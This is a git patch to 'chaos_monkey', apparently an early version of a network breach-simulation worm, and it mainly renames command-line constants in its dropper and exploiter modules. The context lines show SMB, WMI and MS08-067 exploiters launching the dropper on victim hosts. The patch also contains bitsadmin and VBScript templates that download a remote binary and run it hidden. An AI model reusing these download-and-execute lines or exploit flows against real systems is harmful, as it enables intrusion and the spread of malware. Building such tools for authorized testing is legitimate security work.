From 57e69fafee185fe7ab2859789982cbf789bb5be1 Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Mon, 28 Aug 2017 10:41:11 +0300 Subject: [PATCH] minor fix in dropper Rename constants --- chaos_monkey/dropper.py | 25 ++++++++++++++----------- chaos_monkey/exploit/smbexec.py | 6 +++--- chaos_monkey/exploit/win_ms08_067.py | 6 +++--- chaos_monkey/exploit/wmiexec.py | 6 +++--- chaos_monkey/model/__init__.py | 12 ++++++------ 5 files changed, 29 insertions(+), 26 deletions(-) diff --git a/chaos_monkey/dropper.py b/chaos_monkey/dropper.py index 35390786d..d624775c6 100644 --- a/chaos_monkey/dropper.py +++ b/chaos_monkey/dropper.py @@ -8,7 +8,7 @@ import logging import subprocess import argparse from ctypes import c_char_p -from model import MONKEY_CMDLINE, MONKEY_CMDLINE_LINUX +from model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX from config import WormConfiguration from system_info import SystemInfoCollector, OperatingSystem @@ -93,20 +93,23 @@ class MonkeyDrops(object): except: LOG.warn("Cannot set reference date to destination file") - if OperatingSystem.Windows == SystemInfoCollector.get_os(): - monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path']} - else: - monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_path': self._config['destination_path']} - - + monkey_options = "" if self.opts.parent: - monkey_cmdline += " -p %s" % self.opts.parent + monkey_options += " -p %s" % self.opts.parent if self.opts.tunnel: - monkey_cmdline += " -t %s" % self.opts.tunnel + monkey_options += " -t %s" % self.opts.tunnel if self.opts.server: - monkey_cmdline += " -s %s" % self.opts.server + monkey_options += " -s %s" % self.opts.server if self.opts.depth: - monkey_cmdline += " -d %s" % self.opts.depth + monkey_options += " -d %s" % self.opts.depth + + if OperatingSystem.Windows == SystemInfoCollector.get_os(): + monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options + else: + dest_path = self._config['destination_path'] + monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options + monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")], + 'monkey_commandline': monkey_cmdline} monkey_process = subprocess.Popen(monkey_cmdline, shell=True, stdin=None, stdout=None, stderr=None, diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py index 307cbfa02..e23818f4d 100644 --- a/chaos_monkey/exploit/smbexec.py +++ b/chaos_monkey/exploit/smbexec.py @@ -1,7 +1,7 @@ import sys from logging import getLogger from model.host import VictimHost -from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED +from model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS from exploit import HostExploiter from network.tools import check_port_tcp from exploit.tools import SmbTools, get_target_monkey @@ -99,9 +99,9 @@ class SmbExploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE_DETACHED % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} else: - cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path} + cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} cmdline += build_monkey_commandline(host, depth - 1) diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 02f144851..a372070a8 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -12,7 +12,7 @@ import socket from enum import IntEnum from logging import getLogger from model.host import VictimHost -from model import DROPPER_CMDLINE, MONKEY_CMDLINE +from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from . import HostExploiter from exploit.tools import SmbTools, get_target_monkey from network.tools import check_port_tcp @@ -249,9 +249,9 @@ class Ms08_067_Exploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} else: - cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} + cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} cmdline += build_monkey_commandline(host, depth - 1) diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index 8b4231793..298ec5436 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -3,7 +3,7 @@ import ntpath import logging import traceback from tools import build_monkey_commandline -from model import DROPPER_CMDLINE, MONKEY_CMDLINE +from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from model.host import VictimHost from exploit import HostExploiter from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login @@ -84,9 +84,9 @@ class WmiExploiter(HostExploiter): return False # execute the remote dropper in case the path isn't final elif remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} else: - cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} + cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} cmdline += build_monkey_commandline(host, depth - 1) diff --git a/chaos_monkey/model/__init__.py b/chaos_monkey/model/__init__.py index 1e835cfb5..1296570e1 100644 --- a/chaos_monkey/model/__init__.py +++ b/chaos_monkey/model/__init__.py @@ -4,12 +4,12 @@ __author__ = 'itamar' MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" -DROPPER_CMDLINE = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -# TODO: rename to WINDOWS/LINUX appropriately -MONKEY_CMDLINE = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_LINUX = './%%(monkey_path)s %s' % (MONKEY_ARG, ) -DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) +MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) +MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) +GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' +DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) +MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, ) RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, ) RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )